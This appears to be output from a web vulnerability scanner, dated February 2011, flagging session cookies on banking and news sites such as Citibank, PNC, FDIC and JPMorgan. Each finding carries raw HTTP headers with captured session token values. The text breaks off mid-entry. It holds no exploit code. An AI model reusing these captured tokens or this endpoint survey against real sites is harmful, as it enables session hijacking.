<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://www.citi.com/search/search. ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /us/cards/index.jsp HTTP/1.1 Host: www.citibank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: "" Date: Wed, 02 Feb 2011 22:16:55 GMT Content-length: 854 Content-type: text/html; charset=ISO-8859-1 Cache-Control: no-cache="Set-Cookie" Set-Cookie: JSESSIONID=GlQxNJXX9hjkzSqQqQWNphxfGRm78JMp2dwJ21YKmvTyYW6xpK69!-455328445; path=/ Connection: close
<html> <head> <title>Citi Credit Cards | Choose from a variety of Rewards Credit Cards, Student Credit Cards, Small Business Credit Cards, and Value Credit Cards.</title> <meta name="keywords" co ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/stepthree HTTP/1.1 Host: www.cualn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:00:30 GMT Server: Apache X-Powered-By: PHP/5.2.14 Set-Cookie: SESS5dcca8fe1cebbc00afd6b71bc7e17676=0505b6f8eb0dfb02deb4a1644b2c68ec; expires=Sat, 26-Feb-2011 04:33:50 GMT; path=/; domain=.cualn.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 01:00:30 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 11430
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.directstartv.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /view/?5489 HTTP/1.1 Host: www.emagazine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /LaunchPad/dflt/Login.pncadv HTTP/1.1 Host: www.esp01.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:18:09 GMT Server: Apache Set-Cookie: JSESSIONID=0001MlXU1BY2vtyfBtHvrPCXhsj:pr-rdc678-61015gis-a/espts-ethasp8; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 7069
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <HTML xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en"> <HEAD> <TI ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.fdic.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:18:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 43093 Content-Type: text/html Set-Cookie: ASPSESSIONIDCSBRDRBD=IBKPGPIAFCHAEGEBGLLPBOMO; path=/ Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.firstnational.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Object moved Date: Wed, 02 Feb 2011 21:59:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: http://www.firstnational.com/001/html/en/personal/personal.html Content-Length: 184 Content-Type: text/html Set-Cookie: ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="http://www.firstnational.com/001/html/en/personal/personal.html">here</a>.</body>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /config/html/en/searchresults.asp HTTP/1.1 Host: www.firstnational.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:41:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 25669 Content-Type: text/html Set-Cookie: ASPSESSIONIDQASASQCD=FHHAGHGAJJNGHOEBODOGIMJG; path=/ Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir=" ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /config/html/en/setcookie.asp?default=personal HTTP/1.1 Host: www.firstnational.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;
Response
HTTP/1.1 302 Object moved Connection: close Date: Wed, 02 Feb 2011 22:19:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /001/html/en/personal/personal.html Content-Length: 156 Content-Type: text/html Set-Cookie: fnbDefault=personal; expires=Thu, 02-Feb-2012 06:00:00 GMT; path=/ Set-Cookie: ASPSESSIONIDQASASQCD=OBDAGHGAEBGAPCBHABGIEIIP; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/001/html/en/personal/personal.html">here</a>.</body>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.firstnationalinvestmentsandplanning.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Connection: close Date: Wed, 02 Feb 2011 22:19:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /home/default.asp Content-Length: 138 Content-Type: text/html Set-Cookie: ASPSESSIONIDQSDBQTCD=EDPHJCGACBBDPAOLPJNIMGPO; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/home/default.asp">here</a>.</body>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /fis/worldnews/worldnews.asp HTTP/1.1 Host: www.fis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 03 Feb 2011 00:58:54 GMT Connection: close Content-Length: 83551 Content-Type: text/html Set-Cookie: ASPSESSIONIDCASTCAST=PMHBFPGBGMDOPCOGKGMJMGLM; path=/ Cache-control: private
<html> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta http-equiv="refresh" content="1800"> <title>FIS - Worldnews - Icelandic Group still up for grabs</title ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /tag/ipboard HTTP/1.1 Host: www.forum-software.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /article/food-2011-01-11-boycotting-bluefin-isnt-enough-time-to-turn-on-the-siren HTTP/1.1 Host: www.grist.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 01:15:49 GMT Server: Apache X-Powered-By: PHP/5.2.4-2ubuntu5.12 Set-Cookie: PHPSESSID=394bce86b159c0f351253ee87caa8df9; path=/ Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: exp_last_visit=981364550; expires=Fri, 03-Feb-2012 01:15:50 GMT; path=/; domain=.grist.org Set-Cookie: exp_last_activity=1296724550; expires=Fri, 03-Feb-2012 01:15:50 GMT; path=/; domain=.grist.org Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A82%3A%22%2Farticle%2Ffood-2011-01-11-boycotting-bluefin-isnt-enough-time-to-turn-on-the-siren%2F%22%3B%7D; path=/; domain=.grist.org Last-Modified: Thu, 03 Feb 2011 01:15:50 GMT Content-Type: text/html X-Cache: MISS from grist-squid02.prod.grist.org X-Cache-Lookup: MISS from grist-squid02.prod.grist.org:80 Via: 1.0 grist-squid02.prod.grist.org (squid/3.1.8) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceb ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /NASApp/NetAccess/AboutDisplay HTTP/1.1 Host: www.ibsnetaccess.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000UNiRaq4SV-vGMcUowkf6zr5:15bs25f24; origin=https://www.ibsnetaccess.com/NASApp/NetAccess/LoginDisplay; TLTUID=C697A0BA2F17102F003A8D446414B7D1; URLNamespace=ibsnetaccess; TLTSID=C697A0BA2F17102F003A8D446414B7D1;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:19:24 GMT Server: IBM_HTTP_Server Pragma: no-cache Expires: Tues, 01 Jan 1980 00:00:00 GMT Set-Cookie: JSESSIONID=0000OPVUXvnLQWTsNmxnOsJOjeV:15bs25f24; Path=/; Secure Cache-Control: no-store, no-cache=set-cookie Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 13482
<html lang="en">
<head> <title>FIA Card Services Net Access: About Net Access</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /NASApp/NetAccess/ContactsDisplay HTTP/1.1 Host: www.ibsnetaccess.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000UNiRaq4SV-vGMcUowkf6zr5:15bs25f24; origin=https://www.ibsnetaccess.com/NASApp/NetAccess/LoginDisplay; TLTUID=C697A0BA2F17102F003A8D446414B7D1; URLNamespace=ibsnetaccess; TLTSID=C697A0BA2F17102F003A8D446414B7D1;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:19:25 GMT Server: IBM_HTTP_Server Pragma: no-cache Expires: Tues, 01 Jan 1980 00:00:00 GMT Set-Cookie: JSESSIONID=0000SvWETqda1i7_tKHrr3Sv1oz:15bs25f24; Path=/; Secure Cache-Control: no-store, no-cache=set-cookie Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 50683
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /NASApp/NetAccess/DisplayScreen HTTP/1.1 Host: www.ibsnetaccess.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000UNiRaq4SV-vGMcUowkf6zr5:15bs25f24; origin=https://www.ibsnetaccess.com/NASApp/NetAccess/LoginDisplay; TLTUID=C697A0BA2F17102F003A8D446414B7D1; URLNamespace=ibsnetaccess; TLTSID=C697A0BA2F17102F003A8D446414B7D1;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:19:24 GMT Server: IBM_HTTP_Server Pragma: no-cache Expires: Tues, 01 Jan 1980 00:00:00 GMT Set-Cookie: JSESSIONID=0000uaCptzS4RqcUf5UlN91Tkfl:15bs25f24; Path=/; Secure Cache-Control: no-store, no-cache=set-cookie Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 5528
<html lang="en">
<head> <title>FIA Card Services Net Access: Server Unavailable</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /NASApp/NetAccess/LoginDisplay HTTP/1.1 Host: www.ibsnetaccess.com Connection: keep-alive Referer: http://www.ibsnetaccess.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=C697A0BA2F17102F003A8D446414B7D1; TLTUID=C697A0BA2F17102F003A8D446414B7D1
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /NASApp/NetAccess/LoginValidation HTTP/1.1 Host: www.ibsnetaccess.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000UNiRaq4SV-vGMcUowkf6zr5:15bs25f24; origin=https://www.ibsnetaccess.com/NASApp/NetAccess/LoginDisplay; TLTUID=C697A0BA2F17102F003A8D446414B7D1; URLNamespace=ibsnetaccess; TLTSID=C697A0BA2F17102F003A8D446414B7D1;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:19:27 GMT Server: IBM_HTTP_Server Set-Cookie: JSESSIONID=0000S2Q7Etp_lSrb_lYGF1ZPcz6:15bs25f24; Path=/; Secure Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 16003
<html lang="en">
<head> <title>FIA Card Services Net Access: Log In Error</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /NASApp/NetAccess/PreAuthentication HTTP/1.1 Host: www.ibsnetaccess.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000UNiRaq4SV-vGMcUowkf6zr5:15bs25f24; origin=https://www.ibsnetaccess.com/NASApp/NetAccess/LoginDisplay; TLTUID=C697A0BA2F17102F003A8D446414B7D1; URLNamespace=ibsnetaccess; TLTSID=C697A0BA2F17102F003A8D446414B7D1;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:19:21 GMT Server: IBM_HTTP_Server Pragma: no-cache Expires: Tues, 01 Jan 1980 00:00:00 GMT Set-Cookie: JSESSIONID=0000dPT7JwmMY0OXpSKUutpWwl4:15bs25f24; Path=/; Secure Cache-Control: no-store, no-cache=set-cookie Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 9179
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /NASApp/NetAccess/TermsOfUseDisplay HTTP/1.1 Host: www.ibsnetaccess.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000UNiRaq4SV-vGMcUowkf6zr5:15bs25f24; origin=https://www.ibsnetaccess.com/NASApp/NetAccess/LoginDisplay; TLTUID=C697A0BA2F17102F003A8D446414B7D1; URLNamespace=ibsnetaccess; TLTSID=C697A0BA2F17102F003A8D446414B7D1;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:19:26 GMT Server: IBM_HTTP_Server Pragma: no-cache Expires: Tues, 01 Jan 1980 00:00:00 GMT Set-Cookie: JSESSIONID=00001XDvv31_zmrc9v6Tt1PrDw0:15bs25f24; Path=/; Secure Cache-Control: no-store, no-cache=set-cookie Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 22822
<html lang="en">
<head> <title>FIA Card Services Net Access: Terms of Use</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /NASApp/NetAccess/popupAction.action HTTP/1.1 Host: www.ibsnetaccess.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000UNiRaq4SV-vGMcUowkf6zr5:15bs25f24; origin=https://www.ibsnetaccess.com/NASApp/NetAccess/LoginDisplay; TLTUID=C697A0BA2F17102F003A8D446414B7D1; URLNamespace=ibsnetaccess; TLTSID=C697A0BA2F17102F003A8D446414B7D1;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:19:20 GMT Server: IBM_HTTP_Server Content-Length: 0 Set-Cookie: JSESSIONID=000012ZpG3MaDEXER8Vm_WoG-co:15bs25f24; Path=/; Secure Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/plain Content-Language: en-US
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /News/Local/2011-02-01/article-2189851/Premiers-Cup-goes-to-Northport-fisher/1 HTTP/1.1 Host: www.journalpioneer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cm/Satellite?c=JPM_Stylesheet_C&cid=1153920691252&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACE_COOKIE=R2666079405; JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Fri, 04-Feb-2011 00:24:08 GMT Date: Thu, 03 Feb 2011 00:07:24 GMT Server: Apache Cache-Control: no-cache="set-cookie" host_service: FutureTenseContentServer:6.3.0 X-Powered-By: Servlet/2.4 JSP/2.0 Set-Cookie: JpmcSession=dGGvNJxcGh2xhXjnF1JqhCZ4Ljh3M5mCNBT3J8BqsXfzcQ0M5J7F!-1882927501; path=/ P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: text/css Content-Length: 12349
/* Global (utility) nav styling */
div#globalNav div#utilSearch ul { padding-left: 14px; /* to make room for corner img */ }
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pages/jpmorgan HTTP/1.1 Host: www.jpmorgan.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2975777359; path=/; expires=Thu, 03-Feb-2011 22:26:48 GMT Date: Wed, 02 Feb 2011 22:19:27 GMT Cache-Control: no-cache="set-cookie" Content-Type: text/html; charset=UTF-8 host_service: FutureTenseContentServer:6.3.0 X-Powered-By: Servlet/2.4 JSP/2.0 Set-Cookie: JpmcSession=GnrDNJYP3rQ6L11G2synp0JL6JxHXW9TGdB8vMPC1NQGLx57M16r!-1967453422; path=/ P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pages/jpmorgan/home/business HTTP/1.1 Host: www.jpmorgan.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501;
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Fri, 04-Feb-2011 01:34:32 GMT Date: Thu, 03 Feb 2011 01:16:45 GMT Cache-Control: no-cache="set-cookie" Content-Type: text/html; charset=UTF-8 host_service: FutureTenseContentServer:6.3.0 X-Powered-By: Servlet/2.4 JSP/2.0 Set-Cookie: JpmcSession=nMmqNKBd14mKjKprddLgg5LQG3W84YhRbtH7cwbSXg0JbGWdDwn2!-1882927501; path=/ P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http: ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pages/jpmorgan/home/corporations HTTP/1.1 Host: www.jpmorgan.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501;
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Fri, 04-Feb-2011 01:34:32 GMT Date: Thu, 03 Feb 2011 01:16:44 GMT Cache-Control: no-cache="set-cookie" Content-Type: text/html; charset=UTF-8 host_service: FutureTenseContentServer:6.3.0 X-Powered-By: Servlet/2.4 JSP/2.0 Set-Cookie: JpmcSession=dngnNKBcnCxn90npyRDyBRmBnpqDC3L4fh11tPryZhTxzXDlLp0W!-1882927501; path=/ P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http: ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pages/jpmorgan/home/fi HTTP/1.1 Host: www.jpmorgan.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501;
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Fri, 04-Feb-2011 01:34:32 GMT Date: Thu, 03 Feb 2011 01:16:45 GMT Cache-Control: no-cache="set-cookie" Content-Type: text/html; charset=UTF-8 host_service: FutureTenseContentServer:6.3.0 X-Powered-By: Servlet/2.4 JSP/2.0 Set-Cookie: JpmcSession=VKhMNKBdKXGg21v2VpNq1hs84JLkKRCZv8TTq0yYQW0GJck1BT00!-1882927501; path=/ P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http: ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pages/jpmorgan/home/individuals HTTP/1.1 Host: www.jpmorgan.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501;
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Fri, 04-Feb-2011 01:34:32 GMT Date: Thu, 03 Feb 2011 01:16:48 GMT Cache-Control: no-cache="set-cookie" Content-Type: text/html; charset=UTF-8 host_service: FutureTenseContentServer:6.3.0 X-Powered-By: Servlet/2.4 JSP/2.0 Set-Cookie: JpmcSession=qLlxNKCQnmKCgKr8R2yplG5KPhTQD1P2b542BT6zCWczkzGRqQLv!-1882927501; path=/ P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
